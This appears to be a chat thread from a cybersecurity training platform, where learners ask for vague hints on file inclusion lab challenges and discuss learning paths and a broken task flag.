Hey guys, I'm attempting to do the file inclusion challenges and I just cannot figure them out. I feel like I'm super close but just cannot put it together with the pieces I'm missing. Anyone complete it that can give me a hand, please?
I got the first two, but the 3rd is melting my brain. All i can say is use burpsuite for at least one of them, and no need to write stuff in a terminal/command-line
On the second one, I got to the page where it says "This is a admin page. Now get the flag." But I have no idea what that means or where I go from there to grab the flag
There is more I have to do besides changing it from Guest to admin?
I'm gonna pick it up again tomorrow. Thanks for the hints
if you ever figure out the third, you're a god
hello can someone tell is it possible to become a cybersecurity specialist with doing bachelors
@ash check the cyber-and-careers channel.
what's the difference between this path and the offensive pentesting path?
This is meant to be more introductory. Going super in depth on all the foundational topics
Walking An Application - Task 6: The last flag does not work (from the XHR)


